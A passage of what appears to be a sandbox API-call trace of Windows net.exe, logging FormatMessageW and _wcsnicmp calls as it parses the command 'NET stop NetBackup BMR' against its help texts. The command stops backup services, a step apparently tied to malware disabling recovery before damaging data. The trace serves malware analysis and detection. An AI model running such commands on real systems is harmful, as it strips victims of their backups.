dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģల") returned 0x12 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START SERVER\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc548a8) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䑠Å\x9e蛬ģవ") returned 0xf [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START UPS\r\n", _MaxCount=0x16) returned 14 [0056.123] LocalFree (hMem=0xc54460) returned 0x0 [0056.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģస") returned 0x17 [0056.123] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START WORKSTATION\r", _MaxCount=0x16) returned 14 [0056.124] LocalFree (hMem=0xc58c00) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģ఻") returned 0x18 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START\r\n[service]\r\n", _MaxCount=0x16) returned 14 [0056.124] LocalFree (hMem=0xc58c00) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģా") returned 0x21 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET STATISTICS\r\n[WORKS", _MaxCount=0x16) returned 14 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģు") returned 0x15 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x16) returned 19 [0056.124] LocalFree (hMem=0xc58c00) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౄ") returned 0x58 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET TIME\r\n\r\n[\\\\compute", _MaxCount=0x16) returned -1 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģే") returned 0x184 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET USE\r\n[devicename |", _MaxCount=0x16) returned -2 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģొ") returned 0xf0 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET USER\r\n[username [p", _MaxCount=0x16) returned -2 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ్") returned 0x47 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET VIEW\r\n[\\\\computern", _MaxCount=0x16) returned -3 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౐") returned 0xc2 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET\r\n [ ACCOUNTS | ", _MaxCount=0x16) returned 19 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౓") returned 0x28d [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="SERVICES\r\nNET START ca", _MaxCount=0x16) returned -5 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౖ") returned 0x483 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="SYNTAX\r\nThe following ", _MaxCount=0x16) returned -5 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģౙ") returned 0xa86 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NAMES\r\nThe following t", _MaxCount=0x16) returned 4 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ౜") returned 0x54 [0056.124] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="\r\nFor more information", _MaxCount=0x16) returned 97 [0056.124] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௼") returned 0xad [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௿") returned 0x2e [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģం") returned 0x7d [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఅ") returned 0x26 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఈ") returned 0x19 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0056.125] LocalFree (hMem=0xc54268) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఋ") returned 0x1b [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఎ") returned 0xbe [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ఑") returned 0x33 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఔ") returned 0x19 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0056.125] LocalFree (hMem=0xc54268) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģగ") returned 0xc1 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0056.125] LocalFree (hMem=0xc60378) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģచ") returned 0x16 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0056.125] LocalFree (hMem=0xc54268) returned 0x0 [0056.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="ᎀÆ\x9e蛬ģఝ") returned 0x33 [0056.125] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0056.125] LocalFree (hMem=0xc61380) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="ᎀÆ\x9e蛬ģఠ") returned 0x234 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0056.126] LocalFree (hMem=0xc61380) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģణ") returned 0x13 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc548a8) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģద") returned 0x14 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc54268) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģ఩") returned 0x14 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START NETLOGON", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc54268) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="㟀Å\x9e蛬ģబ") returned 0x11 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc537c0) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģయ") returned 0x14 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc54268) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģల") returned 0x12 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc548a8) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䑠Å\x9e蛬ģవ") returned 0xf [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc54460) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģస") returned 0x17 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc58c00) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģ఻") returned 0x18 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc58c00) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="ᎀÆ\x9e蛬ģా") returned 0x21 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0056.126] LocalFree (hMem=0xc61380) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģు") returned 0x15 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0056.126] LocalFree (hMem=0xc54268) returned 0x0 [0056.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģౄ") returned 0x58 [0056.126] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0056.126] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģే") returned 0x184 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģొ") returned 0xf0 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ్") returned 0x47 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ౐") returned 0xc2 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ౓") returned 0x28d [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģౖ") returned 0x483 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģౙ") returned 0xa86 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ౜") returned 0x54 [0056.127] _wcsnicmp (_String1="NET stop NetBackup", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ௼") returned 0xad [0056.127] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ௿") returned 0x2e [0056.127] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģం") returned 0x7d [0056.127] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0056.127] LocalFree (hMem=0xc62388) returned 0x0 [0056.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģఅ") returned 0x26 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఈ") returned 0x19 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0056.128] LocalFree (hMem=0xc54268) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģఋ") returned 0x1b [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģఎ") returned 0xbe [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģ఑") returned 0x33 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఔ") returned 0x19 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0056.128] LocalFree (hMem=0xc54268) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģగ") returned 0xc1 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģచ") returned 0x16 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0056.128] LocalFree (hMem=0xc54268) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģఝ") returned 0x33 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="⎈Æ\x9e蛬ģఠ") returned 0x234 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0056.128] LocalFree (hMem=0xc62388) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģణ") returned 0x13 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.128] LocalFree (hMem=0xc548a8) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģద") returned 0x14 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.128] LocalFree (hMem=0xc54268) returned 0x0 [0056.128] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģ఩") returned 0x14 [0056.128] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc54268) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģబ") returned 0x11 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc54268) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģయ") returned 0x14 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0056.129] LocalFree (hMem=0xc54268) returned 0x0 [0056.129] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģల") returned 0x12 [0056.129] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 